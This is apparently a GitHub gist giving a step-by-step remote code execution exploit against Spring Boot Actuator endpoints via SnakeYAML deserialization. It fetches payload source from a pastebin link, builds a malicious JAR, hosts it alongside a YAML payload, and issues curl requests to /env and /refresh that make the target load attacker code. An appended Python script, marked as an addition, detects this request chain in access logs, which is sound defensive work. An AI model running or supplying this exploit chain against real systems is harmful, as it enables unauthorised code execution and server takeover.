
@YasserGersy
Created October 7, 2020 21:42
  • Save YasserGersy/5dfb66bcb3b9f71fe3f80a873001d8d4 to your computer and use it in GitHub Desktop.
# Build test.jar: a ScriptEngineFactory that the target JVM discovers through
# ServiceLoader (META-INF/services) once SnakeYAML instantiates
# javax.script.ScriptEngineManager with a URLClassLoader pointing at our server.
# The factory source is fetched from the pastebin link.
mkdir -p src/META-INF/services
curl https://pastebin.com/raw/XbCvxXT6 -o src/ExploitScriptEngineFactory.java
echo 'ExploitScriptEngineFactory' > src/META-INF/services/javax.script.ScriptEngineFactory
# Compile inside a throwaway JDK container; -target 1.8 keeps the class file
# loadable on Java 8 targets. The commands up to "exit" run inside the container.
docker run -it -v "$(pwd)":/code openjdk /bin/bash
cd /code
javac -source 1.8 -target 1.8 src/ExploitScriptEngineFactory.java
ls src/
jar -cvf test.jar -C src .
ls
exit
# Stage the JAR and the YAML payload in a directory served over HTTP.
# Replace SERVER with a host the target can reach.
mkdir -p server
cp test.jar server
cd server
echo '!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://SERVER/test.jar"] ]] ]' > test.yml
# Serves ./ on port 80 (needs root). This blocks, so run the curl requests
# below from a second shell.
ruby -run -e httpd . -p 80
# 1) Write spring.cloud.bootstrap.location through the POST-able /env actuator
#    endpoint so it points at our YAML.
curl -i -s -k -X $'POST' \
-H $'Host: vulnerable.libcurl.so' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' -H $'Connection: close' \
$'http://vulnerable.libcurl.so/env?spring.cloud.bootstrap.location=http://SERVER/test.yml'
# 2) Trigger /refresh so the new bootstrap location is fetched and parsed by
#    SnakeYAML, which instantiates the tagged classes and loads test.jar.
curl -i -s -k -X $'POST' \
-H $'Host: vulnerable.libcurl.so' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 0' \
$'http://vulnerable.libcurl.so/refresh'
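As a detection counterpart to the procedure above (an added example, not part of the original gist or its author's code): a Python script that scans combined-format access logs for a POST to an /env endpoint carrying spring.cloud.bootstrap.location and pairs it with a following POST to /refresh from the same client, which is exactly the two-request chain the gist issues. The log lines, client and attacker IPs, and the 5-minute pairing window are constructed assumptions.

```python
"""Pair POST /env writes of spring.cloud.bootstrap.location with a following
POST /refresh from the same client in combined-format access logs.
Added example, not part of the original gist; sample log lines are constructed."""
import re
from datetime import datetime
from urllib.parse import parse_qs, urlparse

# Apache/nginx "combined" format; only the fields we need are captured.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
PROPERTY = "spring.cloud.bootstrap.location"
REFRESH_WINDOW_S = 300  # assumption: a refresh within 5 minutes completes the chain

# Constructed sample: one full env+refresh chain, one env write without refresh,
# a refresh with no preceding env write, and a harmless GET /env (read only).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Oct/2020:21:40:01 +0000] "GET /env HTTP/1.1" 200 1510 "-" "curl/7.68.0"
198.51.100.7 - - [07/Oct/2020:21:41:10 +0000] "POST /env?spring.cloud.bootstrap.location=http://203.0.113.9/test.yml HTTP/1.1" 200 48 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Oct/2020:21:41:12 +0000] "POST /refresh HTTP/1.1" 200 2 "-" "Mozilla/5.0"
203.0.113.50 - - [07/Oct/2020:21:43:30 +0000] "POST /actuator/env?spring.cloud.bootstrap.location=http%3A%2F%2F203.0.113.9%2Ftest.yml HTTP/1.1" 200 48 "-" "python-requests/2.24"
10.0.0.9 - - [07/Oct/2020:21:44:00 +0000] "POST /refresh HTTP/1.1" 200 2 "-" "curl/7.68.0"
"""


def parse_line(line):
    """Return (ip, ts, method, route, query) for a combined-format line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], TS_FMT)
    u = urlparse(m["target"])
    return m["ip"], ts, m["method"], u.path.rstrip("/"), parse_qs(u.query)


def detect(log_text):
    """Return findings: 'high' for a bootstrap.location write through /env,
    raised to 'critical' once the same client also POSTs /refresh within
    REFRESH_WINDOW_S seconds."""
    findings = []
    open_by_ip = {}  # ip -> findings still waiting for a matching /refresh
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, route, query = parsed
        if method != "POST":
            continue  # GET /env only reads the environment; the write needs POST
        if route.endswith("/env") and PROPERTY in query:
            f = {
                "severity": "high",
                "ip": ip,
                "env_at": ts,
                "location": query[PROPERTY][0],  # parse_qs already percent-decodes
                "refresh_after_s": None,
            }
            findings.append(f)
            open_by_ip.setdefault(ip, []).append(f)
        elif route.endswith("/refresh"):
            for f in open_by_ip.get(ip, []):
                delta = (ts - f["env_at"]).total_seconds()
                if f["refresh_after_s"] is None and 0 <= delta <= REFRESH_WINDOW_S:
                    f["severity"] = "critical"
                    f["refresh_after_s"] = delta
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The check only sees the property when it travels in the query string as in the gist's curl; the same write can be sent in the POST body, which a plain access log does not record, so treat an unexplained POST to /env followed by /refresh as worth a look even without the property match.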